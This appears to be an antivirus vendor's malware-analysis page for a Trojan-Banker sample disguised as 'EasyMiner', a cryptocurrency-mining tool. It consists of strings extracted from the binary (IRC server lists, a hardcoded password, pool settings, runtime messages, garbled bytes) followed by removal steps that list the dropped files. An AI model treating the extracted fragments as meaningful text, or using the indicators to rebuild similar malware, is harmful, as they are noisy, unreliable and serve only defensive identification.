<Server>adams.freenode.net:6667</Server>

<Server>barjavel.freenode.net:6667</Server>

<Server>calvino.freenode.net:6667</Server>

<Server>cameron.freenode.net:6667</Server>

<Server>gibson.freenode.net:6667</Server>

<Server>hitchcock.freenode.net:6667</Server>

<Server>hobana.freenode.net:6667</Server>

<Server>holmes.freenode.net:6667</Server>

<Server>kornbluth.freenode.net:6667</Server>

<Server>leguin.freenode.net:6667</Server>

<Server>pratchett.freenode.net:6667</Server>

<Server>rajaniemi.freenode.net:6667</Server>

<Server>sendak.freenode.net:6667</Server>

<Server>wolfe.freenode.net:6667</Server>

<Server>asimov.freenode.net:6667</Server>

<Server>card.freenode.net:6667</Server>

<Server>dickson.freenode.net:6667</Server>

<Server>hubbard.freenode.net:6667</Server>

<Server>moorcock.freenode.net:6667</Server>

<Server>morgan.freenode.net:6667</Server>

<Server>wright.freenode.net:6667</Server>

IconOptions.Arrangement

Password=password

Auto Rember password=1

autowindows=0

modifyport=0

radioweb=myweb.com

% <assemblyIdentity version="1.0.0.0"

name="EasyMiner.exe"

<requestedExecutionLevel

Login

choosenick

*.conf

#Shoutcast Configuration File|*.conf

MainForm.LogIconImageList

WebWallet1

WebWallet

PngImage.Data

6-B}!8

Dnn.YQQA

supporter/partnership page

(email your logo to buzzbuzzu@gmail.com)

*(email contact : buzzbuzzu@gmail.com)*

PA reminder that sometimes a kindly donation is welcome to support this project .

uThis Nag Screen will pop-up from time to time () if you use our project on a daily basis .Just hit No Thanks button

*supporter/partnership page if you wish so.

_Just send us a mail (buzzbuzzu@gmail.com) with your name in wich your donation was made and an

&$#&74$<:

*, #-0%-

63&573/40*/389

/,!.,1//422,12*44

1/1<:164 0.*22)55

<4;4-4*07

, "/- 95

($!--/;;!))

*)4>>$,,

%(#.2- 12*18.4

3/!10)33*22(00)./

.88278628038

&&3;;)11

-55!)))33!))

1- 98 **3;;%--

"**#  )115==&00/9939>$/3(@@

##/77$,, 55$..)48

34(=; 01][[

(48'68$),

'98-77*22&../77 55

!!3==.88

4<<*44.:>

#&"67!10

 .#47#56.::)-.222

"#8@@!

(( /2&7:"/1(00,./)))

'* 47)-.(* >@@

&)7<?:9;

0::!03,8<* /1,.

3==!031<@!

/-"0/)(*1)*

Thanks for all your support!

.CLICK A BUTTON BELOW TO SUPPORT THIS PROJECT

output.txt

tmrcheckpass

tmrexecutebat

fMozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36

lblweb

* Web :

* Nick :

Items.Strings

edtweb

Insert your webpage

edtwebDblClick

owneremail@gmail.com

Portugal

Turkey

`cMDY332<h@B

`cMD2332<h@B

cMD2332<h@B

cMD3332<h@B

12345678

.zUq(

OnKeyDown

SaveTo_PMLog.txt

Open_PMLog.txt

Clear_PMLog.txt

QCONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,

Q- do not spam the wallet button (might get you banned) use the web wallet instead

\- Moneymaker mode supports only LTC farming for now.For BTC or any other cryptocurrency use

E- mining could generate alot of heat .Use Easyminer at your own risk.

bThe information provided on this website does not constitute investment advice, financial advice,

dtrading advice or any other sort of advice and you should not treat any of the website's content as

cyou and nothing on this website should be taken as an offer to buy, sell or hold a cryptocurrency.

eEasyminer will strive to ensure accuracy of information listed on this website although it will not

`may not be suitable for all users of this website. Anyone looking to invest in cryptocurrencies

Zcustom powered ASIC hardware.There is no association between butterflylabs and Open Radio

!S%d&

{Y(Z%s

%fXp\%

Glyph.Data

SaveTo_ChatLog.txt

Open_ChatLog.txt

Clear ChatLog.txt

SaveTo_AnounceLog.txt

Open_AnounceLog.txt

-EasyMiner = VVV.OpenRadioDirectory.com Team =

Visit web Wallet

kEasyMiner will use the MoneyMaker mode.This style will allow one to earn Litecoins using a private stratum

Hpool.For better performance choose a mining style that suits your needs.

ohXXp://ns.adobe.com/xap/1.0/

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:2BD84B996769E4118136EC0334A69C5A" xmpMM:DocumentID="xmp.did:69B7C3E3697211E4A861BA72D989B609" xmpMM:InstanceID="xmp.iid:69B7C3E2697211E4A861BA72D989B609" xmp:CreatorTool="Adobe Photoshop CS5.1 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2BD84B996769E4118136EC0334A69C5A" stRef:documentID="xmp.did:2BD84B996769E4118136EC0334A69C5A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

YpÆ.r

.pSQ1

u!*z.WF

S,\ %U

a.UeT5

z %cKO

.csk:a,

)%Uf=

.xfWr

d,i%f*

[%CXj

DR.rK

-\#%FM

%dSW@

9C-%dRTQK

Z%Cyc)"$

)kc<.xhi

B.RQI

N×BZ

Zo.LB

mk.xi

.yJI\D

OOj%u

MGK.Zs#<

.qT9Ez

55.fX^5%b

.vcwr*

.Zbz'N{=

.U3%s

nWL7.ZB

P.PL@'

.Z%Sl4

8E/o%u

.if6k

.ZEQ=~&-

.Ysl3

q]"&Z%F;

#.NWUu:

C /!.UK(

r%S'H

Z7q%f

%s3;'l

L.QD\

WARNING ! Use your own credentials (username , password , host , port ) - the ones provided here are only for testing purposes..

HotTrackFont.Charset

HotTrackFont.Color

HotTrackFont.Height

HotTrackFont.Name

HotTrackFont.Style

Easy Miner is developed by VVV.OpenRadioDirectory.com

buzzbuzzu@gmail.com

GPU Worker's Password

3Pool's Address/Host (Leave out the "hXXp://" part!)

Pool's Port

CPU Worker's Password

Brush.Style

Pen.Color

GPUMinerPassword

GPUMinerPort

DUse Stratum Mining Proxy (NOTE: This changes the miners' host/port )

StratumProxyPort

$Automatic start when Windows starts

$Automatic start when Windows starts

WARNING ! Use your own credentials (Username ,Password , Host ,Port ) - the ones provided here are only for testing purposes..

? Do not forget to visit VVV.easyminer.net/blog for more info..

[ Keep your secret key and Ltc Public Adress writen down in a safe place away from hackers!

$ Email support : buzzbuzzu@gmail.com

To preserve network stability,any inactive acounts older then 3 days will be deleted in MoneyMaker Mode.There will be No refunds afterwards!

This will check at a specific interval if there are any minerd.exe or cudaminer.exe

orphaned processes left.This usually happends if the user or other malicious program

This is a beta feature.We recommend users test this function before checking this box!

ccminerextracmd

.VDcJMM

<.xQE

?k.TR

~y.On

.OZ6Y

Constraints.MinHeight

Constraints.MinWidth

lblHubHostPort

&Host:port*

lblHubNick

lblHubPass

&Password

spnHubMsgRate

6Broadcast user join/part messages from this connection

Broadcast &Join/parts

Host:port

@Insert a specific message here.This will replace Easyminer Stats

%Update Miner log titles on Mainchat

1Attempt to modify server port if already taken .

BAttempt to modify nickname to his original state(without*_*char)

 Cleanup text windows at a specific interval

Auto clean log windows after

<Server>irc.lotusulalb2.ro:6667</Server>

<Server>irc.lotusulalb2.ro:6668</Server>

<Server>irc.lotusulalb2.ro:6669</Server>

lblIrcPass

edIrcHostPort

edIrcNick

edIrcPass

Coder:buzz(buzzbuzzu@gmail.com)

(Netchat: VVV.netchatlink.sourceforge.net

7zip: VVV.7-zip.org

Visit Website

autrunwindows

''&%%%% %

*.RSm}}}}}~}~}}}~}}SR3*

!46667663

 *[\\]]\\[

HorzScrollBar.Visible

VertScrollBar.Visible

<assemblyIdentity version="1.0.0.0"

<requestedExecutionLevel

hXXp://VVV.w3.org/2001/XMLSchema

hXXp://VVV.w3.org/2000/xmlns/

hXXp://VVV.w3.org/2001/XMLSchema-instance

# hXXp://sourceforge.net/projects/easyminer/

hXXps://liteaddress.org/

Node "%s" not found

IDOMNode required.Attributes are not supported on this node type

Invalid node type Mismatched paramaters to RegisterChildNodes Element does not contain a single text node4DOM Implementation does not support IDOMParseOptions

Node is readonlyCRefresh is only supported if the FileName or XML properties are set

Link Properties!Cannot link to an invalid source.&Break link operation is not supported.

%s Properties%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s)"%s" DOMImplementation already registered

No matching DOM Vendor: "%s"<Selected DOM Vendor does not support this property or method;Property or Method "%s" is not supported by DOM Vendor "%s"

Error creating SSL context. Could not load root certificate.

Could not load certificate.#Could not load key, check password.

SSL status: "%s"

Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.

Command not supported.

Address type not supported.$Error accepting connection with SSL.

Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.

Operation now in progress.

Operation already in progress.

Socket operation on non-socket.

Protocol not supported.

Socket type not supported."Operation not supported on socket.

Protocol family not supported.0Address family not supported by protocol family.

Chunk StartedDThis authentication method is already registered with class name %s.

%s is not a valid service.

Socket Error # %d

%s is not a valid IP address.

Operation would block.

File "%s" not found1Only one TIdAntiFreeze can exist per application."%d: Circular links are not allowed

No data to read.$Can not bind in port range (%d - %d)

Invalid Port Range (%d - %d)

Max line length exceeded.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)

Resolving hostname %s.

Connecting to %s.

IIt's not allowed to add a new chunk because the current image is invalid.oSome operation could not be performed because the system is out of resources. Close some windows and try again.OThis operation is not valid because the current image contains no valid header.

%s is not a valid BCD value$Could not parse SQL TimeStamp string

Invalid SQL date/time values

Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.4Failed attempting to retrieve time zone information.

yThe "Portable Network Graphics" image could not be loaded because one of its main piece of data (ihdr) might be corruptedUThis "Portable Network Graphics" image is invalid because it has missing image parts.[Could not decompress the image because it contains invalid compressed data.

Description: BThe "Portable Network Graphics" image contains an invalid palette.

The file being readed is not a valid "Portable Network Graphics" image because it contains an invalid header. This file may be corruped, try obtaining it again.nThis "Portable Network Graphics" image is not supported or it might be invalid.

This "Portable Network Graphics" image is not supported because either it's width or height exceeds the maximum size, which is 65535 pixels length.

There is no such palette entry.dThis "Portable Network Graphics" image contains an unknown critical part which could not be decoded.pThis "Portable Network Graphics" image is encoded with an unknown compression scheme which could not be decoded.cThis "Portable Network Graphics" image uses an unknown interlace scheme which could not be decoded.-The chunks must be compatible to be assigned.jThis "Portable Network Graphics" image is invalid because the decoder found an unexpected end of the file.8This "Portable Network Graphics" image contains no data.

The "Portable Network Graphics" image can not be resize by changing width and height properties. Try assigning the image from a bitmap.]The program tried to add a existent critical chunk to the current image which is not allowed.

File "%s" not found

output.txt!Owner must be of type TCustomForm&Cannot change the size of a JPEG image

JPEG error #%d

JPEG Image FilejThis "Portable Network Graphics" image is not valid because it contains invalid pieces of data (crc error)

Rich Text Format (*.rtf)|*.rtf

Plain text (*.txt)|*.txt

128-Byte PrefetchingeCPUID leaf 2 does not report cache descriptor information, use CPUID leaf 4 to query cache parameters

Windows 8.1

Windows Server 2012 R2

Invalid MMF name "%s"*The MMF named "%s" cannot be created empty

Win32 error: %s (%u)%s%s

OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters

Failed to Save StreamE%d is an invalid PageIndex value. PageIndex must be between 0 and %d=This control requires version 4.70 or greater of COMCTL32.DLL

No help keyword specified.(Failed to get ANSI replacement character#Unable to open key "%s\%s" for read0Unable to open key "%s\%s" and access value "%s"#"%s\%s\%s" is of wrong kind or size

"%s" does not match RootKey

Failed to clear tab control Failed to delete tab at index %d"Failed to retrieve tab at index %d Failed to get object at index %d"Failed to set tab "%s" at index %d Failed to set object at index %d

Error setting %s.Count8Listbox (%s) style must be virtual in order to set Count#No OnGetItem event handler assigned"Unable to find a Table of Contents

No help found for %s#No context-sensitive help installed$No topic-based help system installed

Invalid clipboard format Clipboard does not support Icons

Text exceeds memo capacity.There is no default printer currently selected/Menu '%s' is already being used by another form

%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex5Cannot create form. No MDI forms are currently active*A control cannot have itself as its parent

Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'

%s property out of range

Scan line index out of range!Cannot change the size of an icon Invalid operation on TOleGraphic

Unsupported clipboard format

Error reading %s%s%s: %s

Failed to get data for '%s'

Resource %s not found

%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group

Property %s does not exist

Thread creation error: %s

Thread Error: %s (%d)*Windows socket error: %s (%d), on API '%s'

Asynchronous socket error %d

%String list does not allow duplicates

Cannot create file "%s". %s

Cannot open file "%s". %s

Unable to write to %s

Invalid stream format$''%s'' is not a valid component name

Invalid property element: %s

Invalid property type: %s

Invalid data type for '%s' List capacity out of bounds (%d)

List count out of bounds (%d)

List index out of bounds (%d) Out of memory while expanding memory stream

Ancestor for '%s' not found

Cannot assign a %s to a %s

Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread

Class %s not found

A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists

2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)

Operation not supported

External exception %x

Interface not supported

%s (%s, line %d)

Abstract Error?Access violation at address %p in module '%s'. %s of address %p

System Error. Code: %d.

Application Error1Format '%s' invalid or incompatible with argument

No argument for format '%s'"Variant method calls not supported

Invalid variant operation

Invalid NULL variant operation%Invalid variant operation (%s%.8x)

%s,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable

Integer overflow Invalid floating point operation

Invalid pointer operation

Invalid class typecast0Access violation at address %p. %s of address %p

Operation aborted(Exception %s in module %s at %p.

!'%s' is not a valid integer value('%s' is not a valid floating point value

'%s' is not a valid date

'%s' is not a valid time!'%s' is not a valid date and time

I/O error %d

0.1.0.34

1.0.0.2

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):

%original file name%.exe:3404
temp0a0.exe:2136
Delete the original Trojan-Banker file.
Delete or disinfect the following files created/modified by the Trojan-Banker:

C:\wallet.7z (803 bytes)
C:\settings.xml (2 bytes)
C:\web.xml (65 bytes)
C:\Log\Easyminer_Log_21Jul2017_1806.txt (384 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\wallet[1].7z (378001 bytes)
C:\be2f0391e89b078af5e7958fce4d0905.ini (72 bytes)
C:\runminer.bat (21 bytes)
C:\temp0a0.exe (732 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\updt[1].zip (2502767 bytes)
C:\EasyMiner.exe.manifest (654 bytes)
C:\runwallet.bat (23 bytes)
C:\Log\Easyminer_Log_21Jul2017_1805.txt (128 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\wallet[1].7z (378001 bytes)
C:\%original file name%.exe (732 bytes)
C:\temp0a0.ini (497 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Trojan-Banker.Win32.Brasil_be2f0391e8

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Trojan-Banker.Win32.Brasil_be2f0391e8

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet